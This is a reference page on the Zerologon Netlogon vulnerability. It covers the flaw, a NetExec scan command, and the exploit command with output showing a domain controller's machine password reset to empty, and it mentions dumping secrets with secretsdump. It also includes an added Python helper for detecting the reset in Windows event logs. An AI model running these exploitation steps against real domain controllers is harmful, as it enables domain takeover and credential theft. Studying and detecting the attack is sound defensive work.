Zerologon

What is Zerologon?

Zerologon is a critical vulnerability disclosed in 2020 and tracked as CVE-2020-1472. It affects Microsoft Windows Server operating systems, specifically their implementation of the Netlogon Remote Protocol (MS-NRPC).

The vulnerability allows an attacker with network access to a domain controller to impersonate the identity of any computer on that network. By exploiting Zerologon, an attacker can gain unauthorized access to a domain controller, potentially compromising the entire domain.

The vulnerability stems from insecure use of AES-CFB8 in the Netlogon authentication handshake (the cipher is run with a fixed, all-zero initialization vector). By sending a series of Netlogon messages with specific parameters, an attacker can set the computer account password to a blank value, effectively bypassing authentication.

Detection

Use NetExec (formerly CrackMapExec, CME) or PingCastle's scanner to detect Zerologon quickly.

netexec smb 192.168.0.1 -u '' -p '' -M zerologon

ZEROLOGO... 192.168.0.1    445    DC01              VULNERABLE
ZEROLOGO... 192.168.0.1    445    DC01              Next step: https://github.com/dirkjanm/CVE-2020-1472

Exploitation

Use Dirkjan's exploit script (the dirkjanm/CVE-2020-1472 repository linked above) to exploit Zerologon.

python cve-2020-1472-exploit.py DC01 192.168.0.1

Performing authentication attempts...
========================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

It will change the DC machine account password to an empty string.
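The password reset above leaves an audit trail on the domain controller: a Security event 4742 (computer account changed) whose Subject is ANONYMOUS LOGON and whose Password Last Set attribute was updated, and, on DCs carrying the August 2020 Netlogon update, a System event 5829 for each vulnerable secure channel connection that is still allowed. The triage logic below is an added example, not code from the original page or from the tools it mentions; the event dicts and message text are constructed to follow the standard Windows templates.

```python
import re

# Added example, not from the page: triage helper for the two Windows events a
# Zerologon-style machine-account reset leaves behind. Events are assumed to be
# dicts carrying the log channel, the EventID and the rendered message text.
ACCOUNT_NAME_RE = re.compile(r"Account Name:\s*(\S[^\n]*)")
PASSWORD_LAST_SET_RE = re.compile(r"Password Last Set:\s*(\S[^\n]*)")


def is_suspicious_4742(message: str) -> bool:
    """True when an unauthenticated principal reset a machine account password.
    In the 4742 template the Subject block precedes the changed-account block."""
    names = [n.strip() for n in ACCOUNT_NAME_RE.findall(message)]
    if len(names) < 2:
        return False
    subject, target = names[0], names[1]          # actor, then changed account
    pw = PASSWORD_LAST_SET_RE.search(message)
    password_changed = pw is not None and pw.group(1).strip() != "-"
    return (subject.upper() == "ANONYMOUS LOGON"
            and target.endswith("$")               # machine accounts end in $
            and password_changed)


def triage(events):
    """Return (event_id, reason) pairs for events worth an analyst's attention."""
    hits = []
    for ev in events:
        eid, msg = ev["event_id"], ev["message"]
        if ev["channel"] == "Security" and eid == 4742 and is_suspicious_4742(msg):
            hits.append((4742, "machine account password reset by ANONYMOUS LOGON"))
        elif ev["channel"] == "System" and eid == 5829:
            hits.append((5829, "Netlogon allowed a vulnerable secure channel connection"))
    return hits


# Constructed sample events shaped like the Windows templates (not real captures).
SAMPLE_EVENTS = [
    {"channel": "Security", "event_id": 4742, "message":   # benign self-rotation
     "A computer account was changed.\nSubject:\n\tSecurity ID:\tS-1-5-18\n"
     "\tAccount Name:\tDC01$\nComputer Account That Was Changed:\n"
     "\tAccount Name:\tDC01$\nChanged Attributes:\n\tPassword Last Set:\t9/14/2020 10:02:11 AM\n"},
    {"channel": "Security", "event_id": 4742, "message":   # Zerologon-style reset
     "A computer account was changed.\nSubject:\n\tSecurity ID:\tS-1-5-7\n"
     "\tAccount Name:\tANONYMOUS LOGON\nComputer Account That Was Changed:\n"
     "\tAccount Name:\tDC01$\nChanged Attributes:\n\tPassword Last Set:\t9/14/2020 10:05:37 AM\n"},
    {"channel": "System", "event_id": 5829, "message":
     "The Netlogon service allowed a vulnerable Netlogon secure channel connection.\n"},
]
```

A 4742 raised by ANONYMOUS LOGON without a Password Last Set change is deliberately not flagged, so the rule keys on the password reset itself rather than on the principal alone.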

Harvesting

Now use Impacket's secretsdump to dump the DC's secrets.

Note that the dollar sign in the machine account name is escaped.
